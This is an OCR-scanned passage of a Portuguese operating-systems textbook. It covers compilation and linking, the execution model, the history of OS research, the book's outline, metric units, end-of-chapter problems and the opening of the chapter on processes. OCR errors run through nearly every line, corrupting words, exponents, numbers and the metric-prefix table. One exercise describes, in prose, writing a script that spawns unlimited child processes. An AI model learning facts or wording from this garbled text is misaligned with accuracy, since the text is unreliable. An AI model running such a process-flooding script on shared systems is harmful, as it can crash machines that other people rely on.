dc quais arquivos de ca beęalho e totalni en te impraiicavet 
sem urna ferramenta dc auxflio. 

Felizmeme, os compuiadores sao muilo bons cm fazer 
exaumeme essę lipo de coisa. Nos sistemas UNIK, ha urn 
programa chamado make (com nu m erosa s variantes, como 
gmake t pmake etc.) que le o Make fik, que lhe diz quais ar- 
quivos sao dependemes de quais outros arquivos. O que o 
make laz c identificar ąuais os arqmvos-objcto rćąueridos 
imediata nieme para constrtiir o binario do sistema opera - 
cional e, para cada urn, verificar se algum dos arquivos dos 
quais depende (o código e os cabeęalłtos) foi modificado 
após a ultima criaęao do arquivo-objeto* Hm caso a firma- 
tivo, esse arquivo-objeto deve ser recompilado. Quando 
make \iver determinado que arquivos .cdevem ser recompi- 
lados, irwoca uin compilador C para compila-Ios novamen- 
te, reduzindo assim o nu mero de compilaęoes a o irtinimo. 
Bm gra ndes projetos, a criaęao do Makeflk e propensa a erro 
e, por isso, ha ferramentas que o fazem automaticamenie. 

Urna vcz quc todos os arquivos .o estejam prontos, sao 
transferidos a urn progi arna chamado linker (ligador) para 
combinar todos eles em um tuhco arquivo binario cxccu- 
tavel. Quatsquer ftmędes de biblioteca chamadas tambem 
sao indutdas nesse porno, refercncias entre funęoes sao re- 
solvidas e endereęos de maquinas sao relocados confonne 
a neccssidade. Quando a ligaęao e conclutda, o resukado ć 
nni programa execulavel tradicionalmente chamado aml 
em sistemas UNIK. Os varios componemes desse processo 
sao ilusirados na Figura 1.27 para um programa com ires 
arquivos C e dois arquivos de cabeęallio. Embora nossa dis- 
cussao seja sobre o deseńvolvimento de sistemas operacio- 
nais, tudo isso se apiica ao deserwoMmento de qualquer 
programa de grandę porte. 

1»8.41 O modelo de execuęao 

Unia vez que o sistema operacional binario tenha sido 
ligado, o computador pode ser reiniciado e o novo sistema 
operacional carregado. Ao ser executado, pode carregar de 
modo dinamico pedaęos que nao foram estaticamente m- 
clnfdos no sistema binario, como drivers dc dispositivo c 



I Figura 1.27 O processo de compilaęao C e arquivos de 
cabeęalho para. criar um arquivo executavei. 


sistemas de arqnivo. No tempo de execnęao, o sistema ope¬ 
racional pode consistir de segmentos muitipłos, para o tex- 
to (o código do programa), os da dos e a pilha. O segmento 
de texto e normalmeme imutavel, nao mudando durante a 
execuęao. O segmento de dados comeęa com determinado 
tamanho e e inicializado com determmados va!ores, mas 
pode mudar e crescer conforme a necessidade, A pilha esta 
inidalmente vazia, mas cresce e encołhe a medida qtie as 
fmięoes sao chamadas e relornam. Muiias vezcs o segmen- 
to dc lexto e coloeado próximo a parte inlcnor da nienió- 
da ( os segmentos de dados logo acima, com a capaddade de 
crescer para dnia, e o segmento de pilha cm um endereęo 
virLiial alto, com a capaddade de crescer para baixo (em 
direęao ao endereęo zero dc memória), mas sistemas dife- 
rent es funcionam de modos diferentes, 

Em todos os casos, o código do sistema operacional e 
cxecutado diretamenie pdo hardware, sem imerpretado- 
res e sem compilaęao just-in-time, como e normal no caso 
da linguagem Java. 



Pesquisas em sistemas 
operacionats 


A cicncia da computaęao avanęa muito rapidamen- 
te e e diffcil dizer para onde se dirige. Pesąuisadores em 
univcrsidadc5 c cm laboratórios industriais estao sempre 
deseńvolvendo novas ideias; algumas ddas nao levatn a 
nada, porem oiitras tornam-sc a base para futnros produtos 
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e causam altos impacios a industria e aos consumidores. 
Foyer u ma retrospectiva de como as coisas evoiufram e 
mais facil do que predizer como evolnirao. Separar o jolo 
do trigo e muito diffril, porąue muitas vezes uma ideia Ieva 
de 20 a 30 a nos para causar algtmi impacto. 

Por exemplo, ąnando o presidente nortc-arncricano 
Eisenhower criou a ARPA (Advanced Research Projects 
Agency, a agenda de pesąuisas em projeios avanęados do 
Departameoto de Defesa), em 1958, ele estava tentando 
resolvero problema da influcncia avassaladora que o Exer- 
cito dc Lin ha sobre o oręamento de pcsqnisas do Pentagono 
em detriniento da Marinha c da Foręa Aerea. Ele na o es ta¬ 
ra tentando inyentar a Internet. Mas inna das coisas que a 
ARPA fez foi finandar algumas pcsąuisas cm univcrsidodes 
sobre o entao obscuro conceito de comutaęao de pacoles, 
que rapidamenie levou a primdra rede experimemal de 
comulaęao de pacotes, a ARPANET Essa rede nasceu em 
1969, Antes, porem, ouiras redes de pesąuisa financiadas 
pela ARPA foiam conectadas a ARPANET c assim nasceu 
a internet. A Internet foi osada durante 20 anos por pes- 
ąuisadores acadćmicos para trocar mensagens eletrónicas. 
No infrio da dćcada dc 1990, Tlm Bemcrs-Lec concebcu a 
World Wide Web em seu laboraiório de pcsąuisas no CERN 
em Genebra, e Marc Andrcesen projetou urn visualizador 
(browser) gra ii co para essa rede mundial na UnWersidade 
de Illinois. De um moment o para ouiro, a Internet estava 
repleta de adolescentes batendo papo. O presidente Eisen¬ 
hower esta, provavelmente, rolando cm sua sepuItura, 

As pcsąuisas em sistemas operacionais tambem tern 
levado a mudanęas dramaticas nos sistemas praticos. Con- 
forme disculido anieridrmonie, os primciros computadorcs 
comerciais eram todos sistemas cm lotc {bateh), aic que o 
MIT imentou o tempo compartiihado intcrativo no infcio 
dos a nos 1960. Os computadorcs eram todos baseados cni 
iexto, ate ąuc Dong Engdbart itwentou o mouse c a intet- 
face graflca com o usuario (GDI) no Stanford Instituie of 
Research no linal da decada de 1960. Quem dc voces sabe 
o que veio depois? 

Ncsta seęao c cm oulras afins, por todo este livro, co- 
nheceremos algumas das pcsąuisas cm sistemas operacio¬ 
nais dos łiiiimos cinco ou dez a nos, apenas para termos 
uma ideia do que pode surgir no liorizonte. Esta imrodu- 
ęao ccnarncmc nao e abrangeme c bascia-sc ampla menie 
cm artigos publicados nos rnelhores periodicos e semina- 
rios, idcias que, pelo men os, sobre viveram a um rigoroso 
proccsso dc avaliaęao anies de serem publicadas. A maioria 
dos artigos citados nas seęoes dc pesąuisa fot publicada pcla 
ACM, pcla IEEE Computer Society ou pela USENIX c esta 
disponfvel na Internet aos membros (estudantes) dessas or- 
ganizaęóes. Para mais informaęocs sobre cssas organ izaęocs 
c suas bibliotccas digitais, consultc os sites da Web a seguir: 

ACM http://www.acm.org 

IEEE Computer Society http://www.computer.org 

USENIX http://www.usenix.org 


Ouase todos os pesąuisadores da area sabem que os 
sistemas operacionais atnais sao macięos, rfgidos, nao eon- 
fiavcis, inseguros e chcios de erros, alguns niais quc oulros 
(os mmm ndosdo citados aq u i para protegeros culpados). Conse- 
ąuentememe, ha muitas pcsąuisas sobre como construir sis¬ 
temas operacionais melhores. Rccentementc foram publi¬ 
cados trabalhos sobre novos sistemas operacionais (Krieger 
et al., 2006), estrutura de sistemas operacionais (Fassino et 
aL, 2002), precisaodc sistemas operacionais (Elphinsione ct 
al., 2007; Ku mar e Li, 2002; Yang et aL, 2006), conti a bili- 
dade de sistemas operacionais (Swift et aL, 2006; LeYasseur 
ct al, 2004), maquinas virtuais (Barham ct al., 2003; Gar- 
finkel et al., 2003; King et al., 2003: Whitaker ei al., 2002), 
vfrus e vermes {worm) (Costa et al., 2005; Portokalidis et 
al., 2006; Tu cek et aL, 2007; Vrab!e et al, 2005), erros e 
depuraęao (Chou et al., 2001; King et al., 2005), hyper 
threading e multithreading (Fedorova, 2005; Bulpin e Pratt, 
2005) e comportamento do usuario ( Yu et aL, 2006), entre 
muitos oulros tópicos, 


1.10 


Delineamento do restante 
deste livro 


Acabamos de dar uma panoramica nos sistemas ope¬ 
racionais, £ o momento, entao, de entrarmos nos detalhes. 
C on formę mendo na mos anteriormente, do p on to de vista 
do programador, a principal finaiidade de um sistema ope- 
racional c fornecer algumas abstraęocs fundament ais, das 
quais as mais importantes sao processos e threads, espaęos 
de endcreęamento e arquivos. Portanto, os tres capftulos 
seguintes sao dedicados a esses tópicos crudais. 

O Capfmlo 2 trata dc processos e threads. Nele sao dis- 
cutidas suas propriedades e como eles se comunicam entre 
si. Sao dados tambem varios exemplos detalhados sobre 
como funciona a conumicaęao entre processos e como evi- 
tar algumas ciladas. 

No Captiulo 3, esiudaremosem detalhes os espaęos de 
endcreęamento e sens auxi!iares, o gerendamemo de me- 
mória. O hnportante tópico da memória virtual sera exa- 
minado, com conccitos estreitamente relacionados, como 
pa gin a ęa o e segmentaęao, 

Em seguida, no Capiiulo 4, tratamos do tema impor- 
tantfssimo de sistemas de arquivos. Em grandę medida, o 
quc o usuario vc e, em sua maior parte, o sistema dc arqui- 
vos. Examinaremos tamo a interface como a implementa- 
ęao do sistema de arquivos. 

A cntrada/saida ć abordada no Capftulo 5. Os concci¬ 
tos de independenda e depcndencia ao dispositivo sao es- 
tudados. Varios dispositivos importantes — induindo dis- 
cos, teclados c monitores — sao usados como excmpios. 

O Capftulo 6 c sobre impasses (deadbeks). Descrevcmos 
brevemente o que sao impasses, mas ha muito mais a dizer 
sobre eles. Sao discutidas tambem soiuęoes preventivas. 

Nessc ponto termina nosso estudo sobre os prindpios 
basicos de sistemas operacionais com uma linica CPU, Con- 
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tudo, ha mais a dizer, especialmmte sobre tópicos avan- 
ęados. No Capitulo 7, entao, hosso estudo avanęa, trata li¬ 
do dc sistemas irmltimidia, quc tem varias propricdadcs c 
diversos reąuisitos que diferem dos sistemas operacionais 
corwendonais. Entre outros iiens, o e scalona men to e o sis- 
tema de arquivos sao afetados pela natureza da multirmdia. 
Outro tópico ayanęado sao os sistemas com multiplos pro- 
ccssadores, induindo multiprocessadores, computadorcs 
paraldos e sistemas distribmdos, Esses assuntos sao anali- 
sados no Capitulo S. 

U ni tema imporiamissimo c a seguranęa do sisiema 
operackmal, que e visia no Capftulo 9. Entre os tópicos dis- 
culidos nesse capitulo, es ta o as anieaęas (por exemplo # de 
yfrus e de vermes). Tambem sao abordados mecanismos 
de proieęao. c modelos de seguranęa. 

Em seguida, estudamos alguns sistemas operacionais 
rcais + Sao des: Linux (Capitulo 10), Windows Visia (Ca- 
pfiulo I I) c Symbian (Capitulo 12). O livro lenni na com 
algtimas reflexdes sobre projeto de sisiemas operacionais 
no Capitulo 13. 


l.ti 


Unidades metricas 


Para evitar qualquer eon hi sao, e rnelhor dizer clara- 
mente quc, neste livro, como na dencia da computaęao 
em geral, sao usadas unidades metricas, e nao as tradido- 
nais unidades inglesas (sisiema furlon$-$tone-fortm§hi ). Os 
prindpais prefixos metricos sao reladonados na Tabela 
1.4. Normalnienie esses prefteos sao abreviados por suas 
primeiras letras, com as unidades maiores que 1 em leiras 
maiusciilas. Assmi, um banco de dados de 1 TB ocupa i O 1 ' 
bytes dc meniória e um tique de relógio dc 100 pseg (ou 
100 ps) ocorre a cada 10 _JO scgimdos. Como ambos os pre- 
lixos, mili c mi ero, comeęam com a letra Tn H , fol necessario 
fazer uma escolha. Normalnienie, 'm' e para mili e y (a 
letra grega mu) e para micro. 


Coiwem tambem observar que, para medir tamanhos 
de memória, as unidades tem significados um pouco di- 
ferentes, O quilo coircspondc a 2 10 (1,024), c nao a 10 ,J 
(1.000), pois as memórias sao sempre exprcssas era po 
tencias de 2. Assim, uma memória de 1 KB cornem 1.024 
bytes, e nao 1.000 bytes. De maneira similar, urna memória 
de 1 MB eon tem 2 20 (1.048.576) bytes, c uma memória de 
1 GB contćm 2™ (1.073.741.824) bytes. Contudo, inna li- 
nha de conumicaęao dc 1 Kbps transmite a 1.000 bits por 
segundo, e uma rede local (LAN) de 10 Mbps transmite 
a 10.000.000 bits por segundo, pois essas velocidades nao 
sao potencias de 2. Infelizmentc, muitas pcssoas len de tu a 
misiu rar esses dois sistemas, cspcdalmente em tamanhos 
de disco. Para evitar ambiguidade, neste livro usaremos os 
sfmbolos KB, MB e GB para 2 l[> , 2 20 e 2 W bytes, rcspectiva- 
mente, e os s&nbolos Kbps, Mbps e Gbps para )0\ 10 & , 10 lJ 
b i ts/seg u n do , respecti va mc nie. 


1.12 


Res umo 


Gs sistemas operacionais podein ser analisados de dois 
pornos de vista: como gerenciadores de recursos e como 
maqumas estendidas. Como gerenciador de recursos, o 
trabalho dos sistemas operacionais ć gerendar efi ci en te- 
me nte as diferenles parłeś do sisiema, Sob o porno de visia 
da maąuina estendida, sua tarcia e oferecer aos usuarios 
absiraęoes quc sejarn mais convcnicnies ao uso do que a 
maąuina reat. Elas incluem processos, cspaęos de endere- 
ęa niemo e arquivos. 

Os sistemas operacionais tcm uma ionga historia, que 
comeęou ąuando eles subsiiuniam o operador e vai ate os 
sistemas modernos de multiprogramaęao, com destagues 
para os sistemas em lote (batch), sistemas de multiprogra- 
maęao e sistemas de computadorcs pessoais. 

Como os sistemas operacionais imeragem intimamen- 
te com o hardware, algum eon hec i men to sobre o hardware 


Exp. 

Expllcito 

Prefixo 

Exp. 

Explicito 

Prefixo 

io- a 

0,001 

mili 

10 " 

1.000 

quilo 

10- 6 

0,000001 

micro 

10 ^ 

1 . 000.000 

mega 

10 * 

0,000000001 

narto 

10 a 

1 . 000 . 000.000 

giga 

10-' 5 

0.000000000001 

pico 

10 15 

1 , 000 . 000 . 000,000 

tera 

10’ 5 

0,000000000000001 

femto 

10 ,s 

1 . 000 . 000 . 000 . 000.000 

peta 

10 a 

0,000000000000000001 

atto 

I0 ia 

1 . 000 , 000 - 000 . 000 , 000.000 

exa 

10 ‘ 2 ’ 

0,000000000000000000001 

zepto 

KF 

1 . 000 . 000 . 000 , 000 , 000 . 000,000 

zetta 

10 ^ 

0.000000000000000000000001 

yocto 

10 ^ 

1 . 000 . 000 . 000 . 000 . 000 . 000 . 000.000 

yotta 


I Tabela 1.4 Os principais preftxos metricos. 
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de computadores e util para entende-Ios. Os computadores 
sao co nst i tu id os de processadores, memórias e dispositivos 
de E/S. Essas partes sao conectadas por barramentos. 

Os concdtos basicos sobre os quais todos os sistemas 
operacionais sao construfdos sao: processos, gerenda- 
inemo de memória, gerendamenio de E/S, sistema de 
arquivos e seguranęa. Trata-se de cada um desses concei- 
los em um capfmlo subsequente. 

O coraęao dc qualąucr sistema opcracional c o conjun- 
to de chamadas de sistema com o qual de pode Udar. Essas 
diamadas dizeni o quc o sistema operadonal realmente 
faz. Para o UNIX, esmdamos quatro grupos de chamadas 
de sistema. O primeiro rclaciona-se com a criaęao c a fi- 
nalizaęao de processos. O segundo grupo e para leitura e 
escrita ern arquivos, O tercei.ro e voliado ao gerericiamento 
de diretórios* O qnarto grupo eontem chamadas diversas* 
Os sistemas operacionais padem ser estruturados de 
varias manciras. As mais comuns sao as seguintes: como 
sistemas monolfticos, como unia Iiierarquia de ca mad as, 
como um micronudeo, como um sistema dc maquina 
yirtual como um exomldeo o u por meio do modeio 
dicntc-scrvidor, 

Problemas 

1- O que e multiprogramaęao? 

O que e a tecnica de spooling? Vocc acha que compu- 
tadores pessoais avanęados terno o spooling como u ma 
ca ra eter fst i ca-pa dra o no futuro? 

3. Nos printeiros computadores, todo byle de dados lido ou 
escriio era tratado pela CPU (isto e, nao havia DMA). 
Quais as implicaęfe disso para a mulliprogramaęao? 

4. A idcia dc familia dc computadores foi introduzida nos 
anos 1960 com os computadores de grandę porte IBM Sys¬ 
tem/ 360. Essa idcia esta mona c sepultada ou ainda vivc? 

5. Urna razao para a dem ora da adoęao das imeriaces gra- 
ficas GUI era o ciasto do hardware necessario para dar 
supone a elas. De quama RAM de video se precisa para 
dar suporte a unia tela de texto monocromatica com 25 
linhas x 80 cokmas dc caractcrcs? Quanio e necessario 
para dar supone a um mapa dc bits com J .024 x 768 pi- 
xds de 24 bits? Qual e o custo dessa RAM em prcęos de 
1980 (5 dólares/KB)? Quanto custa agora? 

6. Ha varias melas de projeto na construęao dc um sistema 
opcracional; porexemplo, utillzaęao de recursos, oportu- 
nidadc, robustcz etc. Dc um cxemplo de duas melas dc 
projeto que possani ser contraditórias, 

7. Das instruęoes a seguir, quais só podem ser executadas 
em modo nucleo? 

(a) Desa bil ile todas as imerrupęóes. 

(b) Leia o horario do relógio, 

(c) Altere o horario do relógio, 
w Altere o mapa de memória. 


8 . Considerc um sistema quc tem duas CPUs e cada CPU 
tern dois threads (hyperthreading). Suponha que tres 
próg ram as, PfK PI e P2 t sejam iniciados com tenipos de 
execuęao dc 5, 10 e 20 ms, respectivamente, Quamo 
tempo seria necessario para concluir a execiięao desses 
programas? Suponha quc todos os tres programas sejam 
100% CPU bound (limitados peta CPU, ou seja, que nao 
fazem E/S), nao bioqueiem durante a execuęao e nao 
mudem de CPUs uma vez realizada a atribuięao. 

9. Um compLitador Lem um pipę linę de quatro estagios. 
Cada estagio leva o mesmo tempo para fazer sen ira- 
balho — digatnos, 1 ns, Quantas instruęoes por segundo 
essa inaąuina pode exccutar? 

10. Considere um sistema de computador que tem memó- 
ria cache, memória principal (RAM) e disco, O sistema 
operacional usa memória virtua1. Sao necessarios 2 ns 
para acessar uma palavra a pariir da cache, 10 ns para 
acessar urna palavra a pariir da RAM e 10 ms para aces¬ 
sar uma palavra a panir do disco. Se a laxa de acerto 
da cache e de 95% e a da memória principal (após urna 
fal ta dc cache) e de 99%, quai e o tempo medio dc 
acesso a uma palavra? 

11. Um revisor ale na sobre um erro de ortografia no original 
de um livro-texto sobre sistemas operacionais que esta 
para ser impresso. O iivro tem a pro xi mada menie 700 pa- 
ginas, cada uma com 50 linhas dc 80 caractcrcs. Quan- 
to tempo sera pretiso para percorrer eletronicamente o 
texio no caso de a cópia esta rem cada um dos nfvds de 
memória da Figura 1.9? Para metodosdearmazenamemo 
interno, considerc que o tempo dc accsso e dado por ca- 
ractere; para discos, considere que o tempo e por btoco de 
l .024 caractcrcs; c para (itas, que o tempo dado e a panir 
do inicio dos dados com acesso subsequeEite na mesma 
velocidade que o acesso a disco, 

12. Quando um programa de usuario Jaz uma cha mada de 
sistema para terou escrever urn arquivo em disco, ele for- 
uccc uma indicaęao dc qual arqutvo dc qucr, um pon- 
teiro para o btiffer dc dados e um contador. O controle 
e, en ta o, transferido ao sistema operacional, que chama 
o driver apropriado. Suponha que o driver inicie o disco, 
termine e só volte quando uma intermpęao ocorrer. No 
caso da leitura do disco, obviamente quern chama devera 
ser bloqueado (pois nao ha dados para cle). E no caso 
da escrita no disco? Quem chama precisa ser bloqueado 
aguardando o finał da transferencia do disco? 

13. O que ć uma instruęao trap? Explique scu uso cm sisie- 
mas operacionais. 

14. Qual e a dilerem;a fundamental entre um trap e uma in- 
terrupęao? 

15. Porquc e necessana uma tabela de processos cm sistemas 
de compartilhamento de tempo? Essa tabela tambem e 
esscncial cm sistemas dc computador pessoal (PC), nos 
quais existe apenas um proccsso, quc detem o comando 
de loda a maquina ale que ele termine? 

16. Ha alguma razao para se querer momar um sistema de 
arquivos em um diretório nao vazio? Se ha, qual e? 
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17- Qual ć a Rnalidadc dc uma chamada dc sistema cm um 
sisiema operacional? 

18. Para cada u ma das seguimes chaniadas dc sistcma, de urna 
condięao quc faęa com qne das fal hem: fork, &xec c unlink. 

19. Considere count = write(fd # bufrer, nbytes); essa chamada 
pode retornar algum va1or cm count que seja dlfercntc dc 
nbytes? Em caso aflrmativo, porque? 

20> Um arquivoaijo descritor e fd contem a seguime sequen- 
cia de byies: 3, 1,4, 1, 5, 9, 2 f 6, 5, 3, 5. Sao e?;ecutadas 
as seguimes chamadas dc sistema: lseek(fd, 3, SEEK_SET); 
read(fd, 8-bofFer, 4); oude a cha mada Iseek faz unia busca ao 
bytc 3 doarquivo, 0 ąucobufFercomein ao finał da leitura? 

21. Imagine quc um arquivo dc 10 MB esteja armazenado 
cm um disco na mesnia trilha (trilha fr:30) cm setnres 
consecutivos. O braęo do disco esta rituado sobre a trilha 
niimcro 100. Quanto tempo c necessario para recuperar 
esse arquivo a partirdo disco? Suponha quc a transferen- 
da do braęo dc um citindro a ouiro leve certa dc 1 ms e 
certa dc 5 ms para que o setor onde o imcio do arquivo 
e$ta armazenado faęa a rotaęao sob a cabcęa. Alein disso, 
suponha quc a leitura ocorra a urna taxa de 100 MB/s, 

22. Qual e a diferenęa essendal entre um arquivo especial de 
blocos c um arquivo especial de caraaeres? 

23, No exempIo dado na Figura 1.17, a rot i na de biblioteca 
e denominada remi e a própria cha mada de sistcma e dc- 
nominada read £ essendal que anibas tenham o raesmo 
nonie? Em caso negativo, qual e a mais importante? 

24, O inodelo cliente~5ervidor e muito osado em sistemas dis- 
tribuidos. Ele pode ser tambem utilizado em um sistcma 
dc mu unico compmador? 

25. Para um programador, unia diamada de sistema sc parece 
com qua!quer outra diamada a unia rotina de biblioteca. 
E importante que um programador saiba quais rotinas de 
biblioteca resultam em diamadas de sistema? Sob quais 
cirainstancias e por que? 

26, A Figura 1.23 mosira que varias chaniadas de sistema 
em UNIX nao tern eqmva]entes na A PI do Win 32. Para 
cada chamada reiacionada que nao lenlia equivalenie 
no Win32, quais sao as consequencias para o progra¬ 
mador de converter um programa UNIX para executar 
no Windows? 


27, Um sistema operacional portaiii e aquele que tern porta- 
bilidade de u ma arąuUetura de sislema a outra seni so- 
frer nenhuma modificaęao, Explique por que e lnviavel 
eonstruir um sistema operacional que seja comple tanie li¬ 
te ponatil. Descreva duas camadas de alto n.ivel obtidas 
ao projetar um sistema operacional que seja a kamenie 
portatil, 

28. Explique como a separaęao enire polilica e mecanismo 
pode aj u dar na construęlo de sistemas opera don ais ba- 
seados em mi ero nikle os. 

29, His algumas questoes para praticarcoiwersao dc unidades; 

(a) Quamo dura um microano em segundos? 

(b) Micrónietros muitas vezes sio chamados de microns, 
Qual o ta ma n ho de um glgamfcron? 

(c) Quantos bytes ha cm I TB dc memória? 

(d) A massa da Terra e de seis mil yottagramas. Qual e 
esse peso em quilogramas? 

30. Escreva um shcll que seja similar ao da Figura 1.1S, mas 
quc contenha codigo sufidente c realnicnte funcionc 
para que seja poss(vcl lesia-io. Voce tambem pode adiclo- 
nar alguns aspeaos, como rediredonamemo de en trąd a e 
sal da, pipes e tarelas em background. 

31. Se voce tern disponivet um sistema pessoal do Lipo UNIX 
(Linux, MINIX, FrecBSD etc), em quc se possa provo- 
car urna fal ha e reiniciar seguramente, enlao escrcva um 
scripi do shcll quc tente criar um nu mero ilimiiado dc 
proccssos filhos c obsenx o quc acontcce. Antes dc exe- 
cutar o cKperimcnto, digilc sync para quc o shcll dcscar- 
regue os buffers do sistema de arquivos no disco para evitar 
danos ao sistema de arquivos. Ohservaęao: nao tente 
fazer isso em sistemas compartilhados sem antes obter a 
pcrmlssao do admimsirador do sistcma, As conscqucncias 
serio instamaneameme 6bvtas P voce sera pego e poderao 
sobrcv!r punięoes, 

32, Examine c teme interpretar o contcudo dc um diretório 
do tipo UNIX on Windows com u ma fenamenta como o 
programa od do UNIX o u o programa Dehu§ do MS-DOS, 
Dka: o modo como voce faz isso depende do que o SO 
permite. Um truąue que pode Juncionar e criar um dire¬ 
tório em urn disco flexivel com um sistema operacional e, 
entao, ler os dados do disco usando um sistema operacio¬ 
nal diferente que permiia esse acesso. 
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Capitulo 



Processos e threads 


Yamos agora inłciar um estudo dętaIliado sobre como 
os sisiemas opcraclonais sao projctados c construfdos. O 
concdto mais central cm qualqucr sistema operacionai e 
o procesjo; unia abstraęao dc um próg ram a cm exeaięao. 
Tudo dcpcnde dessc concdto e ć importanic que o proje- 
lista (e o estudante) de sisiemas operadonais lenha urn 
eotendimento completo do que e um processo, o mais 
cedo possivel. 

Processos sao urna das mais antigas c importantes abs- 
traęoes que o sistema operacionai okręcę. Eies mantem 
a ca pa ci da de de operaęóes (pseudo)concorrentes, mesmo 
quando ha apenas urna CPU dispomVel. Eies transformam 
uma unica CPU cm multiplas CPUs vimiais. Scm a abstra¬ 
ęao de processos, a ciencia da computaęao moderna nao 
exisiiria. Neste capitulo, examinaremos em detalhes pro¬ 
cessos e seus primos irmaos, os threads. 


2.1 


Todos os computadores modernos sao capazes de 
fazer varias coisas a o mesmo tempo. As pessoas acos- 
tnmadas a trabaihar eom compmadorcs pessoais podem 
nao estar completamente cientes desse falo; port anto, 
alguns exemplos podem lorna-lo mais claro. Primeiro 
considcrc um servidor da Web* Solicitaęóes de paginas 
da Web chegam de loda parte. Quando nma solicitaęao 
cliega, o servidor verifica se a pagina necessaria esta na 
ca che. Se esliver, e enviada de vołta; se nao, uma solid- 
taęao de acesso a o disco e i nicią da para busca-la. Entre- 
tanto, do ponto dc cista da CPU, as solicilaęocs dc accsso 
a o disco duram uma eteru i da de. Enquanto espera que 
a solicitaęao de acesso ao disco seja concluida, muitas 
ouiras solidtaęoes podem chegar. Se ha multiplos dis- 
cos presentes, algumas deias o u todas elas podem ser 
enviadas rapidamente a outros discos muito antes de a 
primeira solicitaęao ser atendida, Evidenteincnte, e ne- 
cessario algum modo de modelar e comroiar essa simul¬ 
ta neidade. Os processos (e cspecialmentc os threads) 
podem ajudar aqui. 

Agora considere um usuario de PC. Quando o siste- 
ma c imcializado, muiios processos muiias vezes dcsco- 
nhecidos a o usuario comcęam secreia menie. Por cxe ru¬ 
pio, um processo pode ser i ni da do para espera de e-mails 


que chegam. Outro processo pode ser exccutado pelo 
programa dc antivirus para vcrificar periodicamcnte se 
ha novas deflniędes de amivuus disponfyeis. Alem disso, 
processos de usuarios expKcilos podem estar sendo exe- 
cutados, imprimindo arquivos e gravando um CD-ROM, 
tudo en q u ant o o usuario esta navegando na Web. Toda 
essa atividade tein de ser administrada, e um sistema 
mul ti program a do que sustente multiplos processos e bas- 
tanie u Lii nesse caso. 

Em qualquer sistema multiprogramado, a CPU chaveia 
dc programa para programa, cxcciitando ca da um dclcs 
por dezenas on cenlcnas de milissegundos. Estritamente 
fala udo, enquanto a cada i usta me a CPU executa someme 
um programa, no decorrcr de um segtmdo da pode traba¬ 
ihar sobre varios programas, dando aos usuados a ilusao 
de paraldismo. Algumas vezes, nesse contcxto, fala-se de 
pseudoparalelismo, para contra star com o verdadeiro 
paralehsmo de hardware dos sisiemas multiprocessado- 
res (que tern duas ou mais CPUs que compartilham simuh 
lancamente a mesma memória lisica). Ter controle sobre 
multiplas atiddadcs em paralelo e algo diffcij para as pes¬ 
soas. C on tudo, projetistas dc sisiemas operacionais vcm 
desenvolvendo ao longo dos anos um niodelo conceitual 
(processos sequendais) que facilita o paraldismo. Esse rno- 
delo, sen uso e algumas de suas consequenrias compóem o 
asstmto deste capitulo. 

2.1.11 O modelo de processo 

Nesse modelo, todos os softwares que podem ser exe- 
cutados em um computador — incltisive, algumas vezes, o 
próprio sistema operacionai — sao organizados em varios 
processos seąuenciais (ou, para simplificar, processos). 
Um processo e apenas um programa cm exccuęaa acom- 
pa nli ad o dos valores atuais do contador de programa, dos 
registradores e das variaveis* Conceitualmente, cada pro¬ 
cesso tern sna própria CPU virtuaL fi claro que, na rcali- 
dade, a CPU troca, a todo memento, de urn processo para 
outro, mas, para entender o sistema, e muito mais facil 
pensarem um conjunto de processos executando (pseudo) 
paralela men te do que tentar comroiar o modo como a CPU 
faz esses chaveamcmos + Esse mecanismo de trocas rapidas 
e cha ma do de multiprogramaęao, eon formę visto no Ca- 
pitulo i. 
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Na Figura 2.1 (a), vemos um oomputador muldprogra- 
mado com quatro próg ra mas na memória. Na Figura 2.1 (b) 
estao quatro processos, ca da um com sen próprio f!uxo de 
controle (isto e, seu próprio contador dc programa lógico) 
c cxccutando indcpendcntcmente dos outros. Claro, ha 
semenie um centa dor de programa fisi co, de forma que, 
quando cada processo e executado, seu comador de pro- 
grama lógico e carregado no comador de programa real. 
Quando acaba o tempo de CPU alocado para um processo, o 
comador de programa lisico e salvo no comador de progra¬ 
ma lógico do processo na memória. Na Figura 2.1 (c) vemos 
quc, por um internlo de tempo sufidentemente longo, 
todos os processos estao avanęando, mas, a cada instau- 
te, apenas um unico processo esta real nieme executando. 

Neste capftulo, supomos que ha ja apenas urna CPU. 
Cada vez mais, entretanto, essa suposięao nao e verdadd- 
ra, visto que os novos chips sao muitas vezcs muhiniideo 
(multicorc), com duas, ąuatro ou uiais CPUs, Examinarc- 
mos chips multimkleo e multiprocessadores cm geral no 
Capftulo S, mas, por ora, e mais simples pensar em urna 
CPU de cada vez. Assim, quando dizemos que urna CPU 
pode de falo exeemar apenas um processo por vez, se hou- 
ver dois micie os (ou duas CPUs), cada um deles pode exe- 
cutar apenas um processo por vcz. 

Com o rapido chavcamento da CPU emre os processos, 
a taxa na qual o processo realiza sua computaęao nao sera 
uniforme c provaveimente nao sera nem reproduzivd se 
os mesmos processos forem execmados novameme. Desse 
modo, os processos nao devem ser programa dos com hi- 
póteses predefinidas sobre a temporizaęao. Considere, por 
exemplo, um processo dc E/S quć i nicią unia fita magnetka 
para quesejam resiaurados arquivos de backup; ele execma 
dez mil vezes um laęo ocioso para aguardar que urna rota- 
ęao seja atingida e entao exccuta um comaodo para ler o 
primeiro registro. Se a CPU decidir chavear para um outro 
processo durante a cxccuęao do laęo ocioso, o processo da 
fiia pode nao esiar sendo executado quando a cabeęa de 
kiiura chegar ao prmieiro registro. Quatido um processo 
tem resirięocs criticas de tempo real como essas — isto e, 
eventos espedficos devem ocorrer dentro de um imerva!o 


de tempo prefixado de milissegundos —, e preciso toinar 
medidas especiais para que esses eventos ocorram. Con- 
tudo, em geral a rnaioria dos processos nao e a feta da pelo 
aspecto inereme de mulliprogramaęao da CPU ou pelas ve- 
locidades relativas dos diversos processos. 

A diferenęa entre um processo e um programa e snlil, 
mas crucial. Urna analogia pode aj udar. Imagine um cien- 
tista da computaęao com dotes culinarios e que esta as- 
san do um bolo de amversario para sua filha. Ele tern uma 
receita de bolo de amversario e uma cozinha bem suprida, 
com todos os ingrcdicmes; farm ha, ovos, aętkar, esscncia 
de baimilha, entre ontros. Nessa analogia, a receita e o 
programa (isto e, um algorilmo expresso por uma nota- 
ęao adequada), o ciernista e o processador (CPU) e os in- 
gredientes do bolo sao os dados de entrada. O processo e 
a atividade desempenhada pelo nosso confeiteiro de ler a 
receita, buscor os ingredientes e assar o bolo. 

Agora imagine quc o fil ho do cientista chegue choran- 
do, dizendo que uma abclha o picou. O cientista registra 
